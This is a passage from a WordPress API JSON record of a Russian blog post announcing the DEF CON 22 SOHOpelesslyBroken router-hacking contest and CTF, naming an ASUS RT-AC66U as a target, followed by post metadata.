href=\"http:\/\/defcne.net\/villages\/22\">\u043c\u0435\u0441\u0442\u0435\u0447\u043a\u0438<\/a> \u043f\u043e\u0441\u0435\u0442\u0438\u0442\u044c \u0438 \u043d\u0430 \u043a\u0430\u043a\u0438\u0435 <a href=\"https:\/\/www.defcon.org\/html\/defcon-22\/dc-22-schedule.html\">\u0434\u043e\u043a\u043b\u0430\u0434\u044b<\/a> \u0441\u0445\u043e\u0434\u0438\u0442\u044c.<\/p>\n<p>  \u0412 \u044d\u0442\u043e\u043c \u0433\u043e\u0434\u0443 \u0431\u0443\u0434\u0435\u0442 \u043d\u043e\u0432\u043e\u0435 \u0441\u043e\u0440\u0435\u0432\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u2014 <a href=\"http:\/\/sohopelesslybroken.com\/\">SOHOpelesslyBroken<\/a>, \u043e\u0442 ISE \u0438 EFF. \u0426\u0435\u043b\u044c <a href=\"http:\/\/sohopelesslybroken.com\/track0.php\">Track 0<\/a> \u0441\u043e\u0441\u0442\u043e\u0438\u0442 \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e\u0431\u044b \u043f\u043e\u043a\u0430\u0437\u0430\u0442\u044c \u0440\u0430\u043d\u0435\u0435 \u043d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0434\u043e\u043c\u0430\u0448\u043d\u0438\u0445 \u0431\u0435\u0441\u043f\u0440\u043e\u0432\u043e\u0434\u043d\u044b\u0445 \u0440\u043e\u0443\u0442\u0435\u0440\u0430\u0445. <a href=\"http:\/\/sohopelesslybroken.com\/track1.php\">Track 1<\/a> \u0431\u0443\u0434\u0435\u0442 \u043f\u0440\u043e\u0445\u043e\u0434\u0438\u0442\u044c \u0432 \u0440\u0435\u0436\u0438\u043c\u0435 CTF \u043f\u0440\u044f\u043c\u043e \u0432\u043e \u0432\u0440\u0435\u043c\u044f DEFCON. CTF\u044b \u0432\u0441\u0435\u0433\u0434\u0430 \u043e\u0447\u0435\u043d\u044c \u0432\u0435\u0441\u0435\u043b\u044b\u0435, \u0430 \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u043e \u044d\u0442\u043e\u0442 \u043f\u043e\u0434\u0440\u0430\u0437\u0443\u043c\u0435\u0432\u0430\u0435\u0442 \u0432\u0437\u043b\u043e\u043c \u0440\u0435\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0436\u0435\u043b\u0435\u0437\u0430, \u0447\u0442\u043e \u0432\u0435\u0441\u0435\u043b\u0435\u0435 \u0432\u0434\u0432\u043e\u0439\u043d\u0435!<\/p>\n<p>  <img decoding=\"async\" src=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/63d\/187\/72e\/63d18772e095c8dcad4f18e8c9bc4ed3.png\" alt=\"image\"\/><br \/>  <i>\u0410\u0433\u0430, \u044d\u0442\u043e \u043c\u043e\u0435 \u0440\u0430\u0431\u043e\u0447\u0435\u0435 \u043c\u0435\u0441\u0442\u043e =P<\/i><\/p>\n<p>  \u041c\u0435\u043d\u044f \u043e\u0447\u0435\u043d\u044c \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u0443\u0435\u0442 <a href=\"https:\/\/openwireless.org\/\">EFF Open Wireless Router<\/a> (\u043f\u0435\u0440\u0435\u0432\u043e\u0434\u0447\u0438\u043a\u0430, \u043a \u0441\u043b\u043e\u0432\u0443, \u0442\u043e\u0436\u0435), \u043d\u043e \u043e\u043d\u0438 \u043f\u043e\u043a\u0430 \u043d\u0438\u0447\u0435\u0433\u043e \u043d\u0435 \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u044b\u0432\u0430\u044e\u0442 \u043e\u0431 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0435. \u0412 <a href=\"http:\/\/sohopelesslybroken.com\/track0.php\">\u043f\u0440\u0430\u0432\u0438\u043b\u0430\u0445 \u0441\u043e\u0440\u0435\u0432\u043d\u043e\u0432\u0430\u043d\u0438\u044f<\/a> \u0437\u043d\u0430\u0447\u0438\u0442\u0441\u044f <a href=\"https:\/\/wikidevi.com\/wiki\/ASUS_RT-AC66U\">ASUS RT-AC66U<\/a> (HW Ver. A2) [Version 3.0.0.4.266] \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0433\u043e \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 \u0434\u043b\u044f \u0432\u0437\u043b\u043e\u043c\u0430. \u0423 \u043c\u0435\u043d\u044f \u0435\u0441\u0442\u044c \u043b\u0438\u0448\u043d\u0438\u0439 RT-AC66U \u0434\u043e\u043c\u0430, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u044f \u0440\u0435\u0448\u0438\u043b \u043d\u0430\u043f\u0438\u0441\u0430\u0442\u044c \u043d\u0435\u0431\u043e\u043b\u044c\u0448\u043e\u0439 \u0442\u0443\u0442\u043e\u0440\u0438\u0430\u043b \u0434\u043b\u044f \u0432\u0441\u0435\u0445 \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u043e\u0432 <s>\u0441\u043e\u0440\u0435\u0432\u043d\u043e\u0432\u0430\u043d\u0438\u044f<\/s> CTF<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[],"class_list":["post-230469","post","type-post","status-publish","format-standard","hentry"],"_links":{"self":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/230469","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=230469"}],"version-history":[{"count":0,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/230469\/revisions"}],"wp:attachment":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=230469"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=230469"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=230469"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}